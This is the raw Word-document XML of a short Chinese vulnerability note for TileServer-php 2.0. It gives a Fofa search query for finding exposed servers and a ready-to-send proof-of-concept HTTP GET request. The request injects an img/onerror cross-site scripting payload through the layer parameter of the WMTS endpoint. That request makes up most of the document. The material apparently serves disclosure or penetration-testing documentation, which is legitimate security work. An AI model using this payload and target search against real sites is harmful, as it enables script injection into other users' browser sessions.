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B5B4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Fofa：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39192B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title="TileServer-php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB51328">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5F74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影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6FAD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TileServer-php 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EF78E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE8F623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D56161"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>GET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/tileserver.php/wmts/x/1/1/asd?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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>x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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>layer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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>%3Cimg+src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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>x+onerror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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>alert(document.domain)%3E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379969"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03FCE9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Host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</w:p>
    <w:p w14:paraId="0A0B2C9A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color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Connection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keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794906C9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color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Upgrade-In</w:t>
      </w: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secure-Requests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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534F55D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User-Agent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Mozilla/5.0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(Windows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NT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10.0;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Win64;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x64)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AppleWebKit/537.36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(KHTML,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like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Gecko)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Chrome/142.0.0.0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Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1186C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color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Accept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text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E8390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Sec-Fetch-Site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none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38CE73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Sec-Fetch-Mode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navigate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A306B3A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Sec-Fetch-User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?1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9C20A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Sec-Fetch-Dest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document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D7551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sec-ch-ua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"Chromium";v="142",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"Google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Chrome";v="142",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"Not_A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Brand";v="99"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628774B9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sec-ch-ua-mobile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?0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15602F6A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sec-ch-ua-platform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"Windows"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C31CA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color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Accept-Encoding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gzip,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deflate,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br,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zstd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A61F87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color w:val="296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Accept-Language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zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E20A2B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="1177925"/>
            <wp:effectExtent l="0" t="0" r="12700" b="317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17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5D65E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1342390"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1016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34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C9BB0"/>
    <w:p w14:paraId="0EAEDB6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="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D84499D"/>
    <w:rsid w:val="38972403"/>
    <w:rsid w:val="44EE3FA4"/>
    <w:rsid w:val="48EE5CFA"/>
    <w:rsid w:val="4A3F3D5D"/>
    <w:rsid w:val="4B1411A9"/>
    <w:rsid w:val="650D53ED"/>
    <w:rsid w:val="734C5929"/>
    <w:rsid w:val="7D895CFF"/>
    <w:rsid w:val="7E772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60</Words>
  <Characters>737</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>13</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>772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2025-10-22T02:47:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:31:51Z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eyJoZGlkIjoiMzEwNTM5NzYwMDRjMzkwZTVkZjY2ODkwMGIxNGU0OTUiLCJ1c2VySWQiOiIzMDk0MTQ5NTgifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>BDBBD6D327D54D71AF9FB46CD56D071A_12</vt:lpwstr>
  </property>
</Properties>
</file>